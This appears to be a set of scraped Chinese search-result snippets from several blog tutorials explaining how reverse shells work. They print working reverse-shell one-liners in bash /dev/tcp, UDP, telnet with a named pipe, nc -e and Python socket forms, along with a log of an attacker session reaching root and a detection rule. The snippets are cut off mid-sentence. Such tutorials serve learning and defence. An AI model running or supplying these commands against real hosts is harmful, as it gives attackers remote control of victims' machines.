0>&1 就好理解了,标准输入重定向到标准输出,就是输入的数据来源是输出。此时要把/bin/bash -i &> /dev/tcp/host/port 看成一个整体,这个整体的输入入口就是 bash 的输入,输出就是 tcp 连接的输出,所以 0>&1 就是把 tcp 连接的输出作为 bash 的输入来源。
image 由这张示意图可以很清楚地看到,输入0是由/dev/tcp/192.168.146.129/2333 输入的,也就是攻击机的输入,命令执行的结果1,会输出到/dev/tcp/192.168.156.129/2333上,这就形成了一个回路,实现了我们远程交互式shell 的功能 如下图所示,我在攻击机上输入 ifconfig,查看到的是受害者的ip ,也就是说我们目前已...
///dev/tcp/x.x.x.x/port:调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口 //0>&1:标准输入重定向到标准输出,实现与反弹出来的shell的交互 Linux文件描述符: 0- stdin 代表标准输入,使用<或<<1- stdout 代表标准输出,使用>或>>2- stderr 代表标准错误输出,使用2>或2>> 3)...
匹配规则:bash进程的0,和1文件描述符指向socket sh -i >& /dev/udp/127.0.0.1/1234 0>&1#UDPListener: nc -u -lvp 1234 目标机执行后的结果如下: 创建了一个常住进程“sh -i”, 它的得0和1文件描述符都指向socket。 匹配规则:bash进程的0,和1文件描述符指向socket 0<&196;exec196<>/dev/tcp/127....
首先,攻击端利用`nc -lvp 端口号`命令监听一个特定端口。接着,受害者端生成反弹shell,通过`bash -i >& /dev/tcp/IP/端口号 0>&1`命令,将交互式shell与攻击端服务端连接建立起来。解释这一过程,`nc`用于创建TCP/UDP监听,`bash -i`启动交互式shell,而`/dev/tcp/IP/端口号`是一个特殊...
[192.168.1.103] 41348hostname //第三步(攻击端执行命令)localhost.localdomain //目标执行命令的结果 id //第四步(攻击端执行命令)uid=0(root)gid=0(root)组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 //目标执行命令的结果 hahaha //第五步(执行一个错误的命令)//测试3...
0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口跟攻击机的shell口。这命令的意思也可以理解为,将攻击机窗口的输入当作靶机窗口的输入最终输入给靶机。2代表标准错误输出。 实验 通过一个小实验帮助大家理解 ...
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p 0x03 nc(netcat)反弹 攻击者主机上执行监听命令: nc -lvvp port 目标主机上执行: nc -e /bin/bash x.x.x.x port 如果目标主机linux发行版本没有 -e 参数,还有以下几种方式: ...
0>&1:将标准输入重定向到标准输出 nc Linux命令-nc(端口监控、文件传输、反弹shell等)_lady_killer9的博客-CSDN博客 python python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os...
常用的反弹shell命令:bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(shell script),是一种为 shell 编写的脚本程序。 如何执行 有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以执行 shell种类 linux 代码语言:javascript ...